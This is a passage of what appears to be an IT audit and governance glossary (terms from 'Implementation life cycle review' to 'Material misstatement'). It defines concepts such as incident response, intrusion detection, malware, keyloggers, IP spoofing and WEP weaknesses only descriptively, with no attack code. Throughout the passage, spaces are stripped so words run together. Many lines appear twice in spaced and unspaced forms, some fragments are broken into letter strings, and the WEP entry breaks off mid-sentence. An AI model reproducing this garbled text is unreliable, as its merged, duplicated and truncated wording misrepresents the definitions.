deemedpossiblehasbeenrealized,oritisdeterminedthattheexpectedvaluecannotbe
realizedandtheprogramisterminated)
Implementationlife Referstothecontrolsthatsupporttheprocessoftransformationoftheenterpriseslegacy p
cyclereview
pp p p g y
informationsystemsintotheenterpriseresourceplanning(ERP)applications
ScopeNote:Largelycoversallaspectsofsystemsimplementationandconfiguration,suchas
changemanagement
Incident Anyeventthatisnotpartofthestandardoperationofaserviceandthatcauses,ormaycause,
aninterruptionto,orareductionin,thequalityofthatservice
Incidentresponse Theresponseofanenterprisetoadisasterorothersignificanteventthatmaysignificantly
affecttheenterprise,itspeople,oritsabilitytofunctionproductively
Anincidentresponsemayincludeevacuationofafacility,initiatingadisasterrecoveryplan
(DRP),performingdamageassessment,andanyothermeasuresnecessarytobringan
enterprisetoamorestablestatus.
I id t Th ti l t f i id t t Incidentresponse
plan
Theoperationalcomponentofincidentmanagement
ScopeNote:Theplanincludesdocumentedproceduresandguidelinesfordefiningthe
criticalityofincidents,reportingandescalationprocess,andrecoveryprocedures.
Inconsequential
deficiency
Adeficiencyisinconsequentialifareasonablepersonwouldconclude,afterconsideringthe
possibilityoffurtherundetecteddeficiencies,thatthedeficiencies,eitherindividuallyorwhen
aggregated with other deficiencies would clearly be trivial to the subject matter If a aggregatedwithotherdeficiencies,wouldclearlybetrivialtothesubjectmatter.Ifa
reasonablepersoncouldnotreachsuchaconclusionregardingaparticulardeficiency,that
deficiencyismorethaninconsequential.
Incrementaltesting Deliberatelytestingonlythevalueaddedfunctionalityofasoftwarecomponent
Independence 1.Selfgovernance
2 The freedom from conditions that threaten objectivity or the appearance of objectivity 2.Thefreedomfromconditionsthatthreatenobjectivityortheappearanceofobjectivity.
Suchthreatstoobjectivitymustbemanagedattheindividualauditor,engagement,functional
andorganizationallevels.IndependenceincludesIndependenceofmindandIndependencein
appearance.
ScopeNote:SeeIndependenceofmindandIndependenceinappearance.
Term Definition
Independencein
appearance
Theavoidanceoffactsandcircumstancesthataresosignificantthatareasonableand
informed third party would be likely to conclude weighing all the specific facts and appearance informedthirdpartywouldbelikelytoconclude,weighingallthespecificfactsand
circumstances,thatafirms,auditfunctions,oramemberoftheauditteams,integrity,
objectivityorprofessionalskepticismhasbeencompromised.
Independenceof
mind
Thestateofmindthatpermitstheexpressionofaconclusionwithoutbeingaffectedby
influencesthatcompromiseprofessionaljudgement,therebyallowinganindividualtoactwith
integrityandexerciseobjectivityandprofessionalskepticism.
Independent Theoutwardimpressionofbeingselfgoverningandfreefromconflictofinterestandundue Independent
appearance
Theoutwardimpressionofbeingself governingandfreefromconflictofinterestandundue
influence
Independentattitude ImpartialpointofviewwhichallowsanISauditortoactobjectivelyandwithfairness
IndexedSequential
AccessMethod
(ISAM)
Adiskaccessmethodthatstoresdatasequentiallywhilealsomaintaininganindexofkeyfields
toalltherecordsinthefilefordirectaccesscapability
( )
Indexedsequential
file
Afileformatinwhichrecordsareorganizedandcanbeaccessed,accordingtoapre
establishedkeythatispartoftherecord
Information Anassetthat,likeotherimportantbusinessassets,isessentialtoanenterprisesbusiness.It
canexistinmanyforms.Itcanbeprintedorwrittenonpaper,storedelectronically,
transmittedbypostorbyusingelectronicmeans,shownonfilms,orspokeninconversation.
Information
architecture
InformationarchitectureisonecomponentofITarchitecture(togetherwithapplicationsand
technology)
Informationcriteria Attributesofinformationthatmustbesatisfiedtomeetbusinessrequirements
Information
i i
Dataorienteddevelopmenttechniquesthatworkonthepremisethatdataareatthecenterof
i f i i d h i d l i hi i ifi b i d engineering informationprocessingandthatcertaindatarelationshipsaresignificanttoabusinessand
mustberepresentedinthedatastructureofitssystems
Information
processingfacility
(IPF)
Thecomputerroomandsupportareas
Informationsecurity Ensuresthatwithintheenterprise,informationisprotectedagainstdisclosuretounauthorized
users (confidentiality) improper modification (integrity) and non access when required users(confidentiality),impropermodification(integrity),andnonaccesswhenrequired
(availability)
Informationsecurity
governance
Thesetofresponsibilitiesandpracticesexercisedbytheboardandexecutivemanagement
withthegoalofprovidingstrategicdirection,ensuringthatobjectivesareachieved,
ascertainingthatriskismanagedappropriatelyandverifyingthattheenterprisesresources
areusedresponsibly
Information security The overall combination of technical, operational and procedural measures and management Informationsecurity
program
Theoverallcombinationoftechnical,operationalandproceduralmeasuresandmanagement
structuresimplementedtoprovidefortheconfidentiality,integrityandavailabilityof
informationbasedonbusinessrequirementsandriskanalysis
Term Definition
Informationsystems
(IS)
Thecombinationofstrategic,managerialandoperationalactivitiesinvolvedingathering,
processing storing distributing and using information and its related technologies (IS) processing,storing,distributingandusinginformationanditsrelatedtechnologies
ScopeNote:Informationsystemsaredistinctfrominformationtechnology(IT)inthatan
informationsystemhasanITcomponentthatinteractswiththeprocesscomponents.
Information Thehardware,software,communicationandotherfacilitiesusedtoinput,store,process, Information
technology(IT)
Thehardware,software,communicationandotherfacilitiesusedtoinput,store,process,
transmitandoutputdatainwhateverform
Informed InaRACIchart(Responsible,Accountable,Consulted,Informed),Informedreferstothose
peoplewhoarekeptuptodateontheprogressofanactivity(onewaycommunication)
Infrastructureasa
Service(IaaS)
Offersthecapabilitytoprovisionprocessing,storage,networksandotherfundamental
computingresources,enablingthecustomertodeployandrunarbitrarysoftware,whichcan ( ) p g , g p y y ,
includeoperatingsystems(OSs)andapplications
Ingestion Aprocesstoconvertinformationextractedtoaformatthatcanbeunderstoodby
investigators.
ScopeNote:SeealsoNormalization.
Ingress Networkcommunicationscomingin
Inherentrisk Therisklevelorexposurewithouttakingintoaccounttheactionsthatmanagementhastaken
ormighttake(e.g.,implementingcontrols)
Inheritance(objects) Databasestructuresthathaveastricthierarchy(nomultipleinheritance)
Inheritancecaninitiateotherobjectsirrespectiveoftheclasshierarchy,thusthereisnostrict
hierarchyofobjects
I iti l l d Th i iti li ti d th t ti t t b l d d i t t t th Initialprogramload
(IPL)
Theinitializationprocedurethatcausesanoperatingsystemtobeloadedintostorageatthe
beginningofaworkdayorafterasystemmalfunction.
Initializationvector
(IV)collisions
Amajorconcernisthewaythatwiredequivalentprivacy(WEP)allocatestheRC4initialization
vectors(IVs)usedtocreatethekeysthatareusedtodriveapseudorandomnumber
generatorthatiseventuallyusedforencryptionofthewirelessdatatraffic.TheIVinWEPisa
24bitfieldasmallspacethatpracticallyguaranteesreuse,resultinginkeyreuse.TheWEP
standard also fails to specif ho these IVs are assigned Man ireless net ork cards reset standardalsofailstospecifyhowtheseIVsareassigned.Manywirelessnetworkcardsreset
theseIVstozeroandthenincrementthembyoneforeveryuse.Ifanattackercancapturetwo
packetsusingthesameIV(thesamekeyifthekeyhasnotbeenchanged),mechanismscanbe
usedtodetermineportionsoftheoriginalpackets.Thisandotherweaknessesresultinkey
reuse,resultinginsusceptibilitytoattackstodeterminethekeysused.Theseattacksrequirea
largenumberofpackets(56million)toactuallyfullyderivetheWEPkey,butonalarge,busy
network this can occur in a short time perhaps in as quickly as 10 minutes (although even networkthiscanoccurinashorttime,perhapsinasquicklyas10minutes(although,even
someofthelargestcorporatenetworkswilllikelyrequiremuchmoretimethanthistogather
enoughpackets).InWEPprotectedwirelessnetworks,manytimesmultiple,orall,stationsuse
the same shared key This increases the chances of IV collisions greatly The result of this is
Injection Ageneraltermforattacktypeswhichconsistofinjectingcodethatisthen
interpreted/executedbytheapplication.(OWASP)
Term Definition
Inputcontrol Techniquesandproceduresusedtoverify,validateandeditdatatoensurethatonlycorrect
data are entered into the computer dataareenteredintothecomputer
Inputsandoutputs Theprocessworkproducts/artifactsconsiderednecessarytosupportoperationoftheprocess
ScopeNote:Inputsandoutputsenablekeydecisions,providearecordandaudittrailof
processactivities,andenablefollowupintheeventofanincident.Theyaredefinedatthekey
managementpracticelevel,mayincludesomeworkproductsusedonlywithintheprocessand
are often essential inputs to other processes The illustrative COBIT 5 inputs and outputs areoftenessentialinputstootherprocesses.TheillustrativeCOBIT5inputsandoutputs
shouldnotberegardedasanexhaustivelistsinceadditionalinformationflowscouldbe
defineddependingonaparticularenterprisesenvironmentandprocessframework.
COBIT5perspective
Instantmessaging
(IM)
Anonlinemechanismoraformofrealtimecommunicationbetweentwoormorepeople
basedontypedtextandmultimediadata
ScopeNote:Textisconveyedviacomputersoranotherelectronicdevice(e.g.,cellularphone
orhandhelddevice)connectedoveranetwork,suchastheInternet.
Intangibleasset Anassetthatisnotphysicalinnature
ScopeNote:Examplesinclude:intellectualproperty(patents,trademarks,copyrights,
processes),goodwill,andbrandrecognition
Integratedservices
digitalnetwork(ISDN)
Apublicendtoenddigitaltelecommunicationsnetworkwithsignaling,switchingand
transportcapabilitiessupportingawiderangeofserviceaccessedbystandardizedinterfaces
withintegratedcustomercontrol
ScopeNote:Thestandardallowstransmissionofdigitalvoice,videoanddataover64Kpbs
lines.
Integratedtest
facilities(ITF)
Atestingmethodologyinwhichtestdataareprocessedinproductionsystems
ScopeNote:Thedatausuallyrepresentasetoffictitiousentitiessuchasdepartments,
customers or products Output reports are verified to confirm the correctness of the customersorproducts.Outputreportsareverifiedtoconfirmthecorrectnessofthe
processing.
Integrity Theguardingagainstimproperinformationmodificationordestruction,andincludesensuring
informationnonrepudiationandauthenticity
Intellectualproperty Intangibleassetsthatbelongtoanenterpriseforitsexclusiveuse
Scope Note: Examples include: patents copyrights trademarks ideas and trade secrets ScopeNote:Examplesinclude:patents,copyrights,trademarks,ideas,andtradesecrets.
Interfacetesting Atestingtechniquethatisusedtoevaluateoutputfromoneapplicationwhiletheinformation
issentasinputtoanotherapplication
Internalcontrol
environment
Therelevantenvironmentonwhichthecontrolshaveeffect
Term Definition
Internalcontrolover
financial reporting
Aprocessdesignedby,orunderthesupervisionof,theregistrantsprincipalexecutiveand
principal financial officers or persons performing similar functions and effected by the financialreporting principalfinancialofficers,orpersonsperformingsimilarfunctions,andeffectedbythe
registrantsboardofdirectors,managementandotherpersonneltoprovidereasonable
assuranceregardingthereliabilityoffinancialreportingandthepreparationoffinancial
statementsforexternalpurposesinaccordancewithgenerallyacceptedaccountingprincipals.
Includesthosepoliciesandproceduresthat:
Pertain to the maintenance of records that in reasonable detail accurately and fairly reflect Pertaintothemaintenanceofrecordsthatinreasonabledetailaccuratelyandfairlyreflect
thetransactionsanddispositionsoftheassetsoftheregistrant
Providereasonableassurancethattransactionsarerecordedasnecessarytopermit
preparationoffinancialstatementsinaccordancewithgenerallyacceptedaccounting
principles,andthatreceiptsandexpendituresoftheregistrantarebeingmadeonlyin
accordancewithauthorizationsofmanagementanddirectorsoftheregistrant
Provide reasonable assurance regarding prevention or timely detection of unauthorized Providereasonableassuranceregardingpreventionortimelydetectionofunauthorized
acquisition,useordispositionoftheregistrantsassetsthatcouldhaveamaterialeffectonthe
financial statements
Internalcontrol
structure
Thedynamic,integratedprocesseseffectedbythegoverningbody,managementandall
otherstaffthataredesignedtoprovidereasonableassuranceregardingtheachievementof
thefollowinggeneralobjectives:
Effectiveness,efficiencyandeconomyofoperations
Reliabilityofmanagement
Compliancewithapplicablelaws,regulationsandinternalpolicies
Managementsstrategiesforachievingthesegeneralobjectivesareaffectedbythedesignand
operationofthefollowingcomponents:
Controlenvironment
Informationsystem
Control procedures
Internalcontrols Thepolicies,procedures,practicesandorganizationalstructuresdesignedtoprovide
reasonableassurancethatbusinessobjectiveswillbeachievedandundesiredeventswillbe
preventedordetectedandcorrected
Internalpenetrators Authorizeduserofacomputersystemwhooverstepshis/herlegitimateaccessrights
ScopeNote:Thiscategoryisdividedintomasqueradersandclandestineusers.
Internalrateofreturn
(IRR)
Thediscountratethatequatesaninvestmentcostwithitsprojectedearnings
ScopeNote:WhendiscountedattheIRR,thepresentvalueofthecashoutflowwillequalthe
presentvalueofthecashinflow.TheIRRandnetpresentvalue(NPV)aremeasuresofthe
expected protability of an investment project expectedprotabilityofaninvestmentproject.
Internalstorage Themainmemoryofthecomputerscentralprocessingunit(CPU)
International
Standards
Organization(ISO)
TheworldslargestdeveloperofvoluntaryInternationalStandards
Term Definition
Internet 1.Twoormorenetworksconnectedbyarouter
2.TheworldslargestnetworkusingTransmissionControlProtocol/InternetProtocol(TCP/IP)
tolinkgovernment,universityandcommercialinstitutions
InternetAssigned
NumbersAuthority
(IANA)
ResponsiblefortheglobalcoordinationoftheDNSroot,IPaddressing,andotherInternet
protocolresources
Internetbanking UseoftheInternetasaremotedeliverychannelforbankingservices Internetbanking UseoftheInternetasaremotedeliverychannelforbankingservices
ScopeNote:Servicesincludetraditionalones,suchasopeninganaccountortransferring
fundstodifferentaccounts,andnewbankingservices,suchaselectronicbillpresentmentand
payment(allowingcustomerstoreceiveandpaybillsonabankswebsite).
InternetControl Asetofprotocolsthatallowsystemstocommunicateinformationaboutthestateofservices
MessageProtocol
(ICMP)
p y
onothersystems
ScopeNote:Forexample,ICMPisusedindeterminingwhethersystemsareup,maximum
packetsizesonlinks,whetheradestinationhost/network/portisavailable.Hackerstypically
use(abuse)ICMPtodetermineinformationabouttheremotesite.
InternetEngineering Anorganizationwithinternationalaffiliatesasnetworkindustryrepresentativesthatsets
TaskForce(IETF) Internetstandards.Thisincludesallnetworkindustrydevelopersandresearchersconcerned
withtheevolutionandplannedgrowthoftheInternet.
InternetInterORB
Protocol(IIOP)
Developedbytheobjectmanagementgroup(OMG)toimplementCommonObjectRequest
BrokerArchitecture(CORBA)solutionsovertheWorldWideWeb
ScopeNote:CORBAenablesmodulesofnetworkbasedprogramstocommunicatewithone
another.Thesemodulesorprogramparts,suchastables,arrays,andmorecomplexprogram
subelements,arereferredtoasobjects.UseofIIOPinthisprocessenablesbrowsersand
serverstoexchangebothsimpleandcomplexobjects.ThisdifferssignificantlyfromHyperText
TransferProtocol(HTTP),whichonlysupportsthetransmissionoftext.
Internetprotocol(IP) Specifiestheformatofpacketsandtheaddressingscheme
InternetProtocol(IP)
packetspoofing
AnattackusingpacketswiththespoofedsourceInternetpacket(IP)addresses.
ScopeNote:ThistechniqueexploitsapplicationsthatuseauthenticationbasedonIP
addresses.Thistechniquealsomayenableanunauthorizedusertogainrootaccessonthe
targetsystem.
Internet service A third party that provides individuals and enterprises with access to the Internet and a variety Internetservice
provider(ISP)
AthirdpartythatprovidesindividualsandenterpriseswithaccesstotheInternetandavariety
ofotherInternetrelatedservices
InternetworkPacket
Exchange/Sequenced
PacketExchange
(IPX/SPX)
IPXislayer3oftheopensystemsinterconnect(OSI)modelnetworkprotocol;SPXislayer4
transportprotocol.TheSPXlayersitsontopoftheIPXlayerandprovidesconnectionoriented
servicesbetweentwonodesonthenetwork.
Term Definition
Interrogation Usedtoobtainpriorindicatorsorrelationships,includingtelephonenumbers,IPaddressesand
names of individuals from extracted data namesofindividuals,fromextracteddata
Interruptionwindow Thetimethatthecompanycanwaitfromthepointoffailuretotherestorationofthe
minimumandcriticalservicesorapplications
Afterthistime,theprogressivelossescausedbytheinterruptionareexcessiveforthe
enterprise.
Intranet AprivatenetworkthatusestheinfrastructureandstandardsoftheInternetandWorldWide Intranet AprivatenetworkthatusestheinfrastructureandstandardsoftheInternetandWorldWide
Web,butisisolatedfromthepublicInternetbyfirewallbarriers
Intruder Individualorgroupgainingaccesstothenetworkandit'sresourceswithoutpermission
Intrusion Anyeventduringwhichunauthorizedaccessoccurs
Intrusiondetection Theprocessofmonitoringtheeventsoccurringinacomputersystemornetworktodetect
signsofunauthorizedaccessorattack g
Intrusiondetection
system(IDS)
Inspectsnetworkandhostsecurityactivitytoidentifysuspiciouspatternsthatmayindicatea
networkorsystemattack
Intrusionprevention Apreemptiveapproachtonetworksecurityusedtoidentifypotentialthreatsandrespondto
themtostop,oratleastlimit,damageordisruption
Intrusionprevention
system(IPS)
Asystemdesignedtonotonlydetectattacks,butalsotopreventtheintendedvictimhosts
frombeingaffectedbytheattacks
Intrusivemonitoring Invulnerabilityanalysis,gaininginformationbyperformingchecksthataffectthenormal
operationofthesystem,andevenbycrashingthesystem
Investigation Thecollectionandanalysisofevidencewiththegoaltoidentifyingtheperpetratorofanattack
orunauthorizeduseoraccess
Investmentportfolio Thecollectionofinvestmentsbeingconsideredand/orbeingmade
S CO i ScopeNote:COBIT5perspective
IPaddress AuniquebinarynumberusedtoidentifydevicesonaTCP/IPnetwork
IPAuthentication
Header(AH)
ProtocolusedtoprovideconnectionlessintegrityanddataoriginauthenticationforIP
datagrams(hereafterreferredtoasjust"integrity")andtoprovideprotectionagainstreplays.
(RFC4302).
Scope Note AH ens res data integrit ith a checks m that a message a thentication code ScopeNote:AHensuresdataintegritywithachecksumthatamessageauthenticationcode,
suchasMD5,generates.Toensuredataoriginauthentication,AHincludesasecretsharedkey
inthealgorithmthatitusesforauthentication.Toensurereplayprotection,AHusesa
sequencenumberfieldwithintheIPauthenticationheader.
IPSecurity(IPSec) AsetofprotocolsdevelopedbytheInternetEngineeringTaskForce(IETF)tosupportthe
secure exchange of packets secureexchangeofpackets
Irregularity Violationofanestablishedmanagementpolicyorregulatoryrequirement.Itmayconsistof
deliberatemisstatementsoromissionofinformationconcerningtheareaunderauditorthe
enterpriseasawhole,grossnegligenceorunintentionalillegalacts.
Term Definition
ISO9001:2000 CodeofpracticeforqualitymanagementfromtheInternationalOrganizationfor
Standardization (ISO) ISO 9001:2000 specifies requirements for a quality management system Standardization(ISO).ISO9001:2000specifiesrequirementsforaqualitymanagementsystem
foranyenterprisethatneedstodemonstrateitsabilitytoconsistentlyprovideproductsor
servicesthatmeetparticularqualitytargets.
ISO/IEC17799 Thisstandarddefinesinformation'sconfidentiality,integrityandavailabilitycontrolsina
comprehensiveinformationsecuritymanagementsystem.
Scope Note: Originally released as part of the British Standard for Information Security in 1999 ScopeNote:OriginallyreleasedaspartoftheBritishStandardforInformationSecurityin1999
andthenastheCodeofPracticeforInformationSecurityManagementinOctober2000,itwas
elevatedbytheInternationalOrganizationforStandardization(ISO)toaninternationalcodeof
practiceforinformationsecuritymanagement.ThelatestversionisISO/IEC17799:2005.
ISO/IEC27001 InformationSecurityManagementSpecificationwithGuidanceforUse;thereplacementfor
BS77992.Itisintendedtoprovidethefoundationforthirdpartyauditandisharmonizedwith p p y
othermanagementstandards,suchasISO/IEC9001and14001.
ITapplication Electronicfunctionalitythatconstitutespartsofbusinessprocessesundertakenby,orwiththe
assistanceof,IT
ITarchitecture DescriptionofthefundamentalunderlyingdesignoftheITcomponentsofthebusiness,the
relationshipsamongthem,andthemannerinwhichtheysupporttheenterprisesobjectives
ITgoal AstatementdescribingadesiredoutcomeofenterpriseITinsupportofenterprisegoals.An
outcomecanbeanartifact,asignificantchangeofastateorasignificantcapability
improvement.
ITgovernance Theresponsibilityofexecutivesandtheboardofdirectors;consistsoftheleadership,
organizationalstructuresandprocessesthatensurethattheenterprisesITsustainsand
extendstheenterprise'sstrategiesandobjectives
ITgovernance
framework
Amodelthatintegratesasetofguidelines,policiesandmethodsthatrepresentthe
organizational approach to IT governance framework organizationalapproachtoITgovernance
ScopeNote:PerCOBIT,ITgovernanceistheresponsibilityoftheboardofdirectorsand
executivemanagement.Itisanintegralpartofinstitutionalgovernanceandconsistsofthe
leadershipandorganizationalstructuresandprocessesthatensurethattheenterprise'sIT
sustainsandextendstheenterprise'sstrategyandobjectives.
IT Governance Founded in 1998 by the Information Systems Audit and Control Association (now known as ITGovernance
Institute(ITGI)
Foundedin1998bytheInformationSystemsAuditandControlAssociation(nowknownas
ISACA).ITGIstrivestoassistenterpriseleadershipinensuringlongterm,sustainableenterprise
successandtoincreasestakeholdervaluebyexpandingawareness.
ITincident Anyeventthatisnotpartoftheordinaryoperationofaservicethatcauses,ormaycause,an
interruptionto,orareductionin,thequalityofthatservice
Term Definition
ITinfrastructure Thesetofhardware,softwareandfacilitiesthatintegratesanenterprise'sITassets
ScopeNote:Specifically,theequipment(includingservers,routers,switchesandcabling),
software,servicesandproductsusedinstoring,processing,transmittinganddisplayingall
formsofinformationfortheenterprisesusers
ITinvestment
dashboard
Atoolforsettingexpectationsforanenterpriseateachlevelandcontinuousmonitoringofthe
performanceagainstsettargetsforexpenditureson,andreturnsfrom,ITenabledinvestment
projects in terms of business values projectsintermsofbusinessvalues
ITrisk Thebusinessriskassociatedwiththeuse,ownership,operation,involvement,influenceand
adoptionofITwithinanenterprise
ITriskissue 1.AninstanceofITrisk
2.Acombinationofcontrol,valueandthreatconditionsthatimposeanoteworthylevelofIT
risk risk
ITriskprofile Adescriptionoftheoverall(identified)ITrisktowhichtheenterpriseisexposed
ITriskregister ArepositoryofthekeyattributesofpotentialandknownITriskissues
Attributesmayincludename,description,owner,expected/actualfrequency,potential/actual
magnitude,potential/actualbusinessimpact,disposition.
ITriskscenario ThedescriptionofanITrelatedeventthatcanleadtoabusinessimpact
ITservice ThedaytodayprovisiontocustomersofITinfrastructureandapplicationsandsupportfor
theirusee.g.,servicedesk,equipmentsupplyandmoves,andsecurityauthorizations
ITsteeringcommittee AnexecutivemanagementlevelcommitteethatassistsinthedeliveryoftheITstrategy,
d d f IT i d li d IT j d f overseesdaytodaymanagementofITservicedeliveryandITprojects,andfocuseson
implementationaspects
ITstrategicplan Alongtermplan(i.e.,threetofiveyearhorizon)inwhichbusinessandITmanagement
cooperativelydescribehowITresourceswillcontributetotheenterprisesstrategicobjectives
(goals)
ITstrategycommittee Acommitteeattheleveloftheboardofdirectorstoensurethattheboardisinvolvedinmajor
IT matters and decisions ITmattersanddecisions
ScopeNote:ThecommitteeisprimarilyaccountableformanagingtheportfoliosofITenabled
investments,ITservicesandotherITresources.Thecommitteeistheowneroftheportfolio.
ITtacticalplan Amediumtermplan(i.e.,sixto18monthhorizon)thattranslatestheITstrategicplan
direction into required initiatives resource requirements and ways in which resources and directionintorequiredinitiatives,resourcerequirementsandwaysinwhichresourcesand
benefitswillbemonitoredandmanaged
ITuser ApersonwhousesITtosupportorachieveabusinessobjective
ITIL(ITInfrastructure
Library)
TheUKOfficeofGovernmentCommerce(OGC)ITInfrastructureLibrary.Asetofguidesonthe
managementandprovisionofoperationalITservices
Term Definition
ITrelatedincident AnITrelatedeventthatcausesanoperational,developmentaland/orstrategicbusiness
impact impact
Jobcontrollanguage
(JCL)
Usedtocontrolrunroutinesinconnectionwithperformingtasksonacomputer
Journalentry Adebitorcredittoageneralledgeraccount,inOracle
SeealsoManualJournalEntry.
Judgmentsampling Anysamplethatisselectedsubjectivelyorinsuchamannerthatthesampleselectionprocess Judgmentsampling Anysamplethatisselectedsubjectivelyorinsuchamannerthatthesampleselectionprocess
isnotrandomorthesamplingresultsarenotevaluatedmathematically
Kernelmode Usedforexecutionofprivilegedinstructionsfortheinternaloperationofthesystem.Inkernel
mode,therearenoprotectionsfromerrorsormaliciousactivityandallpartsofthesystem
andmemoryareaccessible.
Keygoalindicator
(KGI)
Ameasurethattellsmanagement,afterthefact,whetheranITprocesshasachievedits
businessrequirements;usuallyexpressedintermsofinformationcriteria ( ) q ; y p
Keylength Thesizeoftheencryptionkeymeasuredinbits
Keymanagement
practice
Managementpracticesthatarerequiredtosuccessfullyexecutebusinessprocesses
Keyperformance
indicator(KPI)
Ameasurethatdetermineshowwelltheprocessisperforminginenablingthegoaltobe
reached
ScopeNote:Aleadindicatorofwhetheragoalwilllikelybereached,andagoodindicatorof
capabilities,practicesandskills.Itmeasuresanactivitygoal,whichisanactionthatthe
processownermusttaketoachieveeffectiveprocessperformance.
Keyriskindicator
(KRI)
Asubsetofriskindicatorsthatarehighlyrelevantandpossessahighprobabilityofpredicting
orindicatingimportantrisk
l k d ScopeNote:SeealsoRiskIndicator.
Keylogger Softwareusedtorecordallkeystrokesonacomputer
Knowledgeportal Referstotherepositoryofacoreofinformationandknowledgefortheextendedenterprise
ScopeNote:Generallyawebbasedimplementationcontainingacorerepositoryof
informationprovidedfortheextendedenterprisetoresolveanyissues
Latency Thetimeittakesasystemandnetworkdelaytorespond
ScopeNote:Morespecifically,systemlatencyisthetimethatasystemtakestoretrievedata.
Networklatencyisthetimeittakesforapackettotravelfromthesourcetothefinal
destination.
Layer 2 switches Data link level devices that can divide and interconnect network segments and help to reduce Layer2switches Datalinkleveldevicesthatcandivideandinterconnectnetworksegmentsandhelptoreduce
collisiondomainsinEthernetbasednetworks
Layer3and4
switches
Switcheswithoperatingcapabilitiesatlayer3andlayer4oftheopensystemsinterconnect
(OSI)model.Theseswitcheslookattheincomingpacketsnetworkingprotocol,e.g.,IP,and
thencomparethedestinationIPaddresstothelistofaddressesintheirtables,toactively
calculatethebestwaytosendapackettoitsdestination.
Term Definition
Layer47switches Usedforloadbalancingamonggroupsofservers
ScopeNote:Alsoknownascontentswitches,contentservicesswitches,webswitchesor
applicationswitches.
Leadership Theabilityandprocesstotranslatevisionintodesiredbehaviorsthatarefollowedatalllevels
oftheextendedenterprise
Leasedline Acommunicationlinepermanentlyassignedtoconnecttwopoints,asopposedtoadialup
line that is only available and open when a connection is made by dialing the target machine or linethatisonlyavailableandopenwhenaconnectionismadebydialingthetargetmachineor
network
Alsoknownasadedicatedline
Legacysystem Outdatedcomputersystems
Levelofassurance Referstothedegreetowhichthesubjectmatterhasbeenexaminedorreviewed
Librarian Theindividualresponsibleforthesafeguardandmaintenanceofallprogramanddatafiles p g p g
Licensingagreement Acontractthatestablishesthetermsandconditionsunderwhichapieceofsoftwareisbeing
licensed(i.e.,madelegallyavailableforuse)fromthesoftwaredeveloper(owner)totheuser
Lifecycle Aseriesofstagesthatcharacterizethecourseofexistenceofanorganizationalinvestment
(e.g.,product,project,program)
Likelihood Theprobabilityofsomethinghappening
Limitcheck Testsspecifiedamountfieldsagainststipulatedhighorlowlimitsofacceptability
ScopeNote:Whenbothhighandlowvaluesareused,thetestmaybecalledarangecheck.
Linkeditor(linkage
di )
Autilityprogramthatcombinesseveralseparatelycompiledmodulesintoone,resolving
i l f b h editor) internalreferencesbetweenthem
Literals Anynotationforrepresentingavaluewithinprogramminglanguagesourcecode(e.g.,astring
literal);achunkofinputdatathatisrepresented"asis"incompresseddata
Localareanetwork
(LAN)
Communicationnetworkthatservesseveraluserswithinaspecifiedgeographicarea
ScopeNote:ApersonalcomputerLANfunctionsasadistributedprocessingsysteminwhich
each computer in the network does its own processing and manages some of its data Shared eachcomputerinthenetworkdoesitsownprocessingandmanagessomeofitsdata.Shared
dataarestoredinafileserverthatactsasaremotediskdriveforallusersinthenetwork.
Log Torecorddetailsofinformationoreventsinanorganizedrecordkeepingsystem,usually
sequencedintheorderinwhichtheyoccurred
Logicalaccess Abilitytointeractwithcomputerresourcesgrantedusingidentification,authenticationand
authorization authorization.
Logicalaccess
controls
Thepolicies,procedures,organizationalstructureandelectronicaccesscontrolsdesignedto
restrictaccesstocomputersoftwareanddatafiles
Logoff Theactofdisconnectingfromthecomputer
Logon Theactofconnectingtothecomputer,whichtypicallyrequiresentryofauserIDand
passwordintoacomputerterminal
Term Definition
Logs/logfile Filescreatedspecificallytorecordvariousactionsoccurringonthesystemtobemonitored,
such as failed login attempts full disk drives and email delivery failures suchasfailedloginattempts,fulldiskdrivesandemaildeliveryfailures
Lossevent Anyeventduringwhichathreateventresultsinloss
ScopeNote:FromJones,J.;"FAIRTaxonomy,"RiskManagementInsight,USA,2008
MACheader Representsthehardwareaddressofannetworkinterfacecontroller(NIC)insideadatapacket
Machinelanguage Thelogicallanguagethatacomputerunderstands Machinelanguage Thelogicallanguagethatacomputerunderstands
Magneticcardreader Readscardswithamagneticsurfaceonwhichdatacanbestoredandretrieved
Magneticink
characterrecognition
(MICR)
Usedtoelectronicallyinput,readandinterpretinformationdirectlyfromasourcedocument
ScopeNote:MICRrequiresthesourcedocumenttohavespeciallycodedmagneticink
Magnitude Ameasureofthepotentialseverityoflossorthepotentialgainfromrealizedevents/scenarios
Mailrelayserver Anelectronicmail(email)serverthatrelaysmessagessothatneitherthesendernorthe
recipientisalocaluser
Mainframe Alargehighspeedcomputer,especiallyonesupportingnumerousworkstationsorperipherals
Malware Shortformalicioussoftware
Designedtoinfiltrate,damageorobtaininformationfromacomputersystemwithoutthe
ownersconsent
ScopeNote:Malwareiscommonlytakentoincludecomputerviruses,worms,Trojanhorses,
spywareandadware.Spywareisgenerallyusedformarketingpurposesand,assuch,isnot
malicious,althoughitisgenerallyunwanted.Spywarecan,however,beusedtogather
information for identity theft or other clearly illicit purposes.
Management Plans,builds,runsandmonitorsactivitiesinalignmentwiththedirectionsetbythe
governancebodytoachievetheenterpriseobjectives.
Management
information system
Anorganizedassemblyofresourcesandproceduresrequiredtocollect,processanddistribute
data for use in decision making informationsystem
(MIS)
dataforuseindecisionmaking
Mandatoryaccess
control(MAC)
Ameansofrestrictingaccesstodatabasedonvaryingdegreesofsecurityrequirementsfor
informationcontainedintheobjectsandthecorrespondingsecurityclearanceofusersor
programsactingontheirbehalf
Maninthemiddle
attack
Anattackstrategyinwhichtheattackerinterceptsthecommunicationstreambetweentwo
parts of the victim system and then replaces the traffic between the two components with the attack partsofthevictimsystemandthenreplacesthetrafficbetweenthetwocomponentswiththe
intrudersown,eventuallyassumingcontrolofthecommunication
Term Definition
Manualjournalentry Ajournalentryenteredatacomputerterminal
ScopeNote:Manualjournalentriescanincluderegular,statistical,intercompanyandforeign
currencyentries.SeealsoJournalEntry.
Mapping Diagrammingdatathataretobeexchangedelectronically,includinghowtheyaretobeused
andwhatbusinessmanagementsystemsneedthem.
See also Application Tracing and Mapping. SeealsoApplicationTracingandMapping.
ScopeNote:Mappingisapreliminarystepfordevelopinganapplicationslink.
Masking Acomputerizedtechniqueofblockingoutthedisplayofsensitiveinformation,suchas
passwords,onacomputerterminalorreport
Masqueraders Attackersthatpenetratesystemsbyusingtheidentityoflegitimateusersandtheirlogon
credentials
Masterfile Afileofsemipermanentinformationthatisusedfrequentlyforprocessingdataorformore
thanonepurpose
Material
misstatement
Anaccidentalorintentionaluntruestatementthataffectstheresultsofanaudittoa
measurableextent
